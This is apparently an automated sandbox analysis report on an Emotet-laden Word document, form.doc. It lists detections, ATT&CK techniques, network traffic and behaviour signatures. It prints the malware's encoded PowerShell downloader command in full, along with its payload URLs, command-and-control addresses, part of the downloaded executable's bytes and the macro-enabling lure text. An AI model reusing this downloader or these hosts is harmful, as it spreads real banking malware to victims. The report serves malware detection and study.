Loading ...

Play interactive tourEdit tour

Analysis Report form.doc

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:208880
Start date:17.02.2020
Start time:20:10:21
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 29s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:form.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winDOC@5/14@3/7
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 30.1% (good quality ratio 28.2%)
  • Quality average: 79.9%
  • Quality standard deviation: 28.3%
HCA Information:
  • Successful, ratio: 85%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • TCP Packets have been reduced to 100
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Emotet
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Hidden Files and Directories1Process Injection12Disabling Security Tools1Input Capture1System Time Discovery2Remote File Copy12Input Capture1Data Encrypted1Uncommonly Used Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaPowerShell3New Service1New Service1Deobfuscate/Decode Files or Information11Network SniffingSecurity Software Discovery2Remote ServicesData from Removable MediaExfiltration Over Other Network MediumCommonly Used Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesScripting2Accessibility FeaturesPath InterceptionScripting2Input CaptureFile and Directory Discovery3Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationRemote File Copy12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExecution through API13System FirmwareDLL Search Order HijackingObfuscated Files or Information1Credentials in FilesSystem Information Discovery37Logon ScriptsInput CaptureData EncryptedStandard Cryptographic Protocol2SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationExploitation for Client Execution3Shortcut ModificationFile System Permissions WeaknessObfuscated Files or Information2Account ManipulationVirtualization/Sandbox Evasion2Shared WebrootData StagedScheduled TransferStandard Non-Application Layer Protocol3Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User Interface1Modify Existing ServiceNew ServiceMasquerading111Brute ForceProcess Discovery3Third-party SoftwareScreen CaptureData Transfer Size LimitsStandard Application Layer Protocol23Jamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentCommand-Line Interface111Path InterceptionScheduled TaskHidden Files and Directories1Two-Factor Authentication InterceptionApplication Window Discovery11Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionVirtualization/Sandbox Evasion2Bash HistoryRemote System Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess Injection12Input PromptSystem Network Connections DiscoveryWindows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://thebluebearyhillproject.com/wp-admin/q07/Avira URL Cloud: Label: malware
Antivirus detection for sampleShow sources
Source: form.docAvira: detection malicious, Label: VBA/Dldr.Agent.erhlk
Found malware configurationShow sources
Source: UXInit.exe.2556.4.memstrMalware Configuration Extractor: Emotet {"C2 list": ["04.236.28.47:8080", "104.236.28.47/ch6aFjXP", "104.236.28.47:8080", "98.239.119.52/VgwZzucbO28XwD"]}
Multi AV Scanner detection for domain / URLShow sources
Source: thebluebearyhillproject.comVirustotal: Detection: 9%Perma Link
Source: http://sportnal.azurewebsites.net/calendar/Xzoo/Virustotal: Detection: 11%Perma Link
Source: http://thebluebearyhillproject.com/wp-admin/q07/Virustotal: Detection: 16%Perma Link
Source: http://teeo.highoninfo.com/wp-admin/1tx/Virustotal: Detection: 9%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: form.docVirustotal: Detection: 62%Perma Link
Source: form.docReversingLabs TitaniumCloud: Detection: 54%
Machine Learning detection for sampleShow sources
Source: form.docJoe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_00212180 CryptDecodeObjectEx,

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\317.exeCode function: 3_2_00428AA3 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlen,
Source: C:\Users\user\317.exeCode function: 3_2_0042FC18 lstrlen,FindFirstFileA,FindClose,
Source: C:\Users\user\317.exeCode function: 3_2_002130C0 FindNextFileW,FindFirstFileW,FindClose,
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: sportnal.azurewebsites.net
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49158 -> 13.85.72.129:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49158 -> 13.85.72.129:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.2:49161 -> 71.126.247.90:80
Source: TrafficSnort IDS: 2404300 ET CNC Feodo Tracker Reported CnC Server TCP group 1 192.168.2.2:49167 -> 104.236.28.47:8080
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.2:49165 -> 80.86.91.91:8080
Source: global trafficTCP traffic: 192.168.2.2:49167 -> 104.236.28.47:8080
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/x-dosexecExpires: Mon, 17 Feb 2020 19:12:36 GMTLast-Modified: Mon, 17 Feb 2020 19:12:36 GMTServer: Microsoft-IIS/10.0Set-Cookie: 5e4ae5a4446f0=1581966756; expires=Mon, 17-Feb-2020 19:13:36 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="WG8ow51j8MD.exe"Content-Transfer-Encoding: binaryX-Powered-By: ASP.NETDate: Mon, 17 Feb 2020 19:12:35 GMTContent-Length: 491703Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 47 fe 53 f9 26 90 00 f9 26 90 00 f9 26 90 00 3a 29 cf 00 fe 26 90 00 3a 29 cd 00 ee 26 90 00 f9 26 91 00 02 27 90 00 de e0 ed 00 e2 26 90 00 de e0 fd 00 73 26 90 00 de e0 fe 00 72 26 90 00 de e0 ec 00 f8 26 90 00 de e0 e8 00 f8 26 90 00 52 69 63 68 f9 26 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 54 81 3c 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 20 04 00 00 60 03 00 00 e0 07 00 10 0c 0c 00 00 f0 07 00 00 10 0c 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 70 0f 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 6a 0f 00 9c 02 00 00 00 10 0c 00 40 5a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 6c 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 0d 0c 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c d8 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 e0 07 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 20 04 00 00 f0 07 00 00 1e 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 60 03 00 00 10 0c 00 00 5e 03 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /calendar/Xzoo/ HTTP/1.1Host: sportnal.azurewebsites.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-admin/1tx/ HTTP/1.1Host: teeo.highoninfo.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-admin/q07/ HTTP/1.1Host: thebluebearyhillproject.comConnection: Keep-Alive
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 98.239.119.52 98.239.119.52
Source: Joe Sandbox ViewIP Address: 104.236.28.47 104.236.28.47
Source: Joe Sandbox ViewIP Address: 104.236.28.47 104.236.28.47
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/ HTTP/1.1Referer: http://104.236.28.47/ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/Content-Type: multipart/form-data; boundary=---------------------------952296233249092User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.236.28.47:8080Content-Length: 4436Connection: Keep-AliveCache-Control: no-cache
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknownTCP traffic detected without corresponding DNS query: 98.239.119.52
Source: unknownTCP traffic detected without corresponding DNS query: 98.239.119.52
Source: unknownTCP traffic detected without corresponding DNS query: 98.239.119.52
Source: unknownTCP traffic detected without corresponding DNS query: 98.239.119.52
Source: unknownTCP traffic detected without corresponding DNS query: 98.239.119.52
Source: unknownTCP traffic detected without corresponding DNS query: 98.239.119.52
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.91
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.91
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.91
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.91
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.91
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.91
Source: unknownTCP traffic detected without corresponding DNS query: 104.236.28.47
Source: unknownTCP traffic detected without corresponding DNS query: 104.236.28.47
Source: unknownTCP traffic detected without corresponding DNS query: 104.236.28.47
Source: unknownTCP traffic detected without corresponding DNS query: 104.236.28.47
Source: unknownTCP traffic detected without corresponding DNS query: 104.236.28.47
Source: unknownTCP traffic detected without corresponding DNS query: 104.236.28.47
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /calendar/Xzoo/ HTTP/1.1Host: sportnal.azurewebsites.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-admin/1tx/ HTTP/1.1Host: teeo.highoninfo.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-admin/q07/ HTTP/1.1Host: thebluebearyhillproject.comConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: sportnal.azurewebsites.net
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/ HTTP/1.1Referer: http://104.236.28.47/ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/Content-Type: multipart/form-data; boundary=---------------------------952296233249092User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.236.28.47:8080Content-Length: 4436Connection: Keep-AliveCache-Control: no-cache
Urls found in memory or binary dataShow sources
Source: UXInit.exe, 00000004.00000002.1382978302.00293000.00000004.00000020.sdmpString found in binary or memory: http://104.236.28.47/ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/
Source: UXInit.exe, 00000004.00000002.1382978302.00293000.00000004.00000020.sdmpString found in binary or memory: http://104.236.28.47:8080/ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/
Source: UXInit.exe, 00000004.00000002.1382978302.00293000.00000004.00000020.sdmpString found in binary or memory: http://104.236.28.47:8080/ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/b
Source: UXInit.exe, 00000004.00000002.1382978302.00293000.00000004.00000020.sdmpString found in binary or memory: http://104.236.28.47:8080/ch6aFjXP/TFyj/3qPFfwLWZo/THwJv/UmwZzaZBm6J/t
Source: UXInit.exe, 00000004.00000002.1382978302.00293000.00000004.00000020.sdmpString found in binary or memory: http://98.239.119.52/VgwZzucbO28XwD/OLIsQLqeqyzclLWVv/dDqe/wmOuSU/6FaQefiFlRcfZlz/
Source: 317.exe.1.drString found in binary or memory: https://www.cloudflare.com/5xx-error-landing?utm_source=error_footer

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Potential key logger detected (key state polling based)Show sources
Source: C:\Users\user\317.exeCode function: 3_2_0041C023 GetKeyState,GetKeyState,GetKeyState,GetKeyState,
Source: C:\Users\user\317.exeCode function: 3_2_00416206 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
Source: C:\Users\user\317.exeCode function: 3_2_0043A602 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,
Source: C:\Users\user\317.exeCode function: 3_2_00438A32 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,
Source: C:\Users\user\317.exeCode function: 3_2_0042D5F7 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,
Source: C:\Users\user\317.exeCode function: 3_2_00437723 GetKeyState,GetKeyState,GetKeyState,

E-Banking Fraud:

barindex
Malicious encrypted Powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABSAG8AbQBiAHcAYgBvAGMAZwBwAGgAYQBmAD0AJwBRAGsAeQBkAHMAZwBlAHIAagBqAGYAJwA7ACQAUgBxAGsAbQBxAGEAcABsAHcAIAA9ACAAJwAzADEANwAnADsAJABNAG0AZgBmAGYAYQBpAHQAbABoAHMAPQAnAE8AcwBqAHEAZgBlAGEAawBmAG0AcwBsACcAOwAkAFIAeABnAG4AZAB1AGMAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgBxAGsAbQBxAGEAcABsAHcAKwAnAC4AZQB4AGUAJwA7ACQAWABjAHMAcQB0AHgAbQB1AGMAYgB1AD0AJwBIAHcAeQBxAGsAZQBtAHAAeQAnADsAJABaAGEAcgBuAG4AYgBsAHcAdgB0AGkAbQA9AC4AKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgB3AGUAYgBDAGwASQBFAE4AVAA7ACQASQB6AG0AdwB4AGIAeQB1AGMAegA9ACcAaAB0AHQAcAA6AC8ALwBzAHAAbwByAHQAbgBhAGwALgBhAHoAdQByAGUAdwBlAGIAcwBpAHQAZQBzAC4AbgBlAHQALwBjAGEAbABlAG4AZABhAHIALwBYAHoAbwBvAC8AKgBoAHQAdABwADoALwAvAHQAZQBlAG8ALgBoAGkAZwBoAG8AbgBpAG4AZgBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAxAHQAeAAvACoAaAB0AHQAcAA6AC8ALwB0AGgAZQBiAGwAdQBlAGIAZQBhAHIAeQBoAGkAbABsAHAAcgBvAGoAZQBjAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHEAMAA3AC8AKgBoAHQAdABwADoALwAvAHQAaABlAG0AZQBmAG8AbABrAHMALgBjAG8AbQAvAHQAcgBlAG4AZAB6AGIAZAAvAG8AYQBHAFoAQwBWAHMASgAvACoAaAB0AHQAcAA6AC8ALwB0AGUAYwBoAG8AdABlAGMAaABzAG8AbAB1AHQAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAFcAOABtADYALwAnAC4AIgBzAGAAcABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEEAZABwAGYAaAB6AG4AdQBvAG0AbAByAD0AJwBaAHEAZwB1AHAAaQB2AGYAdwB0AG8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAEEAcAB1AGgAcQBiAHgAYgAgAGkAbgAgACQASQB6AG0AdwB4AGIAeQB1AGMAegApAHsAdAByAHkAewAkAFoAYQByAG4AbgBiAGwAdwB2AHQAaQBtAC4AIgBkAGAAbwB3AG4AbABvAGEAZABGAGAASQBMAGUAIgAoACQAQQBwAHUAaABxAGIAeABiACwAIAAkAFIAeABnAG4AZAB1AGMAdwApADsAJABIAGgAZQB4AHkAZAB6AHEAcQBoAGcAbQBkAD0AJwBMAHUAdwBmAGUAYQBsAG4AJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABSAHgAZwBuAGQAdQBjAHcAKQAuACIATABgAGUATgBnAHQASAAiACAALQBnAGUAIAAyADQANgAxADEAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAUgBFAEEAYABUAGUAIgAoACQAUgB4AGcAbgBkAHUAYwB3ACkAOwAkAFIAeAB1AGcAdwByAGEAZABnAG4APQAnAE0AbgB1AGEAaQBqAHoAaABtAHQAdgAnADsAYgByAGUAYQBrADsAJABYAGkAYgB2AHYAdAB5AGMAPQAnAEMAdwBqAGwAbwBtAHoAaABtAGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBrAGEAYwBlAGcAbgB3AHgAYgA9ACcAWQBqAHkAaABsAHUAbABtAHgAJwA=
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000003.00000002.998731438.00211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1382927198.00211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.995611411.00200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1382911202.00200000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Screenshot number: 4Screenshot OCR: Enable content button. I t3 I a 13,2 '00%Q A GE)
Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Document image extraction number: 0Screenshot OCR: Enable content button.
Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Document image extraction number: 1Screenshot OCR: Enable content button.
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 2138
Creates files inside the system directoryShow sources
Source: C:\Users\user\317.exeFile created: C:\Windows\system32\UXInit\Jump to behavior
Detected potential crypto functionShow sources
Source: C:\Users\user\317.exeCode function: 3_2_004180EC
Source: C:\Users\user\317.exeCode function: 3_2_0044A120
Source: C:\Users\user\317.exeCode function: 3_2_0045E3C3
Source: C:\Users\user\317.exeCode function: 3_2_0043C4F0
Source: C:\Users\user\317.exeCode function: 3_2_0045E637
Source: C:\Users\user\317.exeCode function: 3_2_004506A9
Source: C:\Users\user\317.exeCode function: 3_2_004567B2
Source: C:\Users\user\317.exeCode function: 3_2_004507BF
Source: C:\Users\user\317.exeCode function: 3_2_0045E941
Source: C:\Users\user\317.exeCode function: 3_2_00462912
Source: C:\Users\user\317.exeCode function: 3_2_0044AC92
Source: C:\Users\user\317.exeCode function: 3_2_0043EEA9
Source: C:\Users\user\317.exeCode function: 3_2_0045B029
Source: C:\Users\user\317.exeCode function: 3_2_0045F0CB
Source: C:\Users\user\317.exeCode function: 3_2_00403080
Source: C:\Users\user\317.exeCode function: 3_2_004531CC
Source: C:\Users\user\317.exeCode function: 3_2_0045D2F9
Source: C:\Users\user\317.exeCode function: 3_2_0043F37C
Source: C:\Users\user\317.exeCode function: 3_2_0043F750
Source: C:\Users\user\317.exeCode function: 3_2_00457875
Source: C:\Users\user\317.exeCode function: 3_2_0045D822
Source: C:\Users\user\317.exeCode function: 3_2_00457A62
Source: C:\Users\user\317.exeCode function: 3_2_0043FB5C
Source: C:\Users\user\317.exeCode function: 3_2_00445C6F
Source: C:\Users\user\317.exeCode function: 3_2_0045DD64
Source: C:\Users\user\317.exeCode function: 3_2_0044DE61
Source: C:\Users\user\317.exeCode function: 3_2_0043FF7C
Source: C:\Users\user\317.exeCode function: 3_2_0020531F
Source: C:\Users\user\317.exeCode function: 3_2_002159E0
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_0020531F
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_002159E0
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: form.docOLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentationOLE, VBA macro: Module Aussyxwatwle, Function Document_open
Document contains embedded VBA macrosShow sources
Source: form.docOLE indicator, VBA macros: true
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\317.exeCode function: String function: 0043D624 appears 96 times
Source: C:\Users\user\317.exeCode function: String function: 0044556E appears 43 times
Source: C:\Users\user\317.exeCode function: String function: 0041EC48 appears 56 times
Source: C:\Users\user\317.exeCode function: String function: 0043CA63 appears 200 times
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.evad.winDOC@5/14@3/7
Contains functionality to create servicesShow sources
Source: C:\Users\user\317.exeCode function: OpenSCManagerW,CloseServiceHandle,CreateServiceW,
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\System32\UXInit\UXInit.exeCode function: 4_2_002142A0 CreateToolhelp32Snapshot,Process32NextW,CloseHandle,
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\317.exeCode function: 3_2_004240A6 __EH_prolog3_catch_GS,VariantClear,SysAllocStringByteLen,CoCreateInstance,CoCreateInstance,CoCreateInstance,
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\317.exeCode function: 3_2_0040C4C0 FindResourceA,LoadResource,FreeResource,
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$form.docJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\UXInit\UXInit.exeMutant created: \Sessions\1\BaseNamedObjects\Global\IBD42A9A6
Source: C:\Users\user\317.exeMutant created: \Sessions\1\BaseNamedObjects\Global\MBD42A9A6
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREF1C.tmpJump to behavior
Document contains an OLE Word Document stream indicating a Microsoft Word fileShow sources
Source: form.docOLE indicator, Word Document stream: true
Document contains summary information with irregular field valuesShow sources
Source: form.docOLE document summary: edited time not present or 0
Found command line outputShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3.i.............3.i....@88.L|.iD.....bl '.i..bl..ykL|.i.............7.i0......i@88..82............. '.i...i....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ...............................u...................u..0.....D...T...........................................>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l..........._._.G.E.N.U.S. . . . . . . . . . .:. .2.D...T...................................L...(...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l......................ul..................u..0.....D...T...................................L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......#..._._.C.L.A.S.S. . . . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S...........#.......L...>...>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......#..............ul..................u..0.....D...T...........................#.......L.......>..u........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........l.......'..._._.S.U.P.E.R.C.L.A.S.S. . . . . .:. ...D...T...........................'.......L...&...>..u........
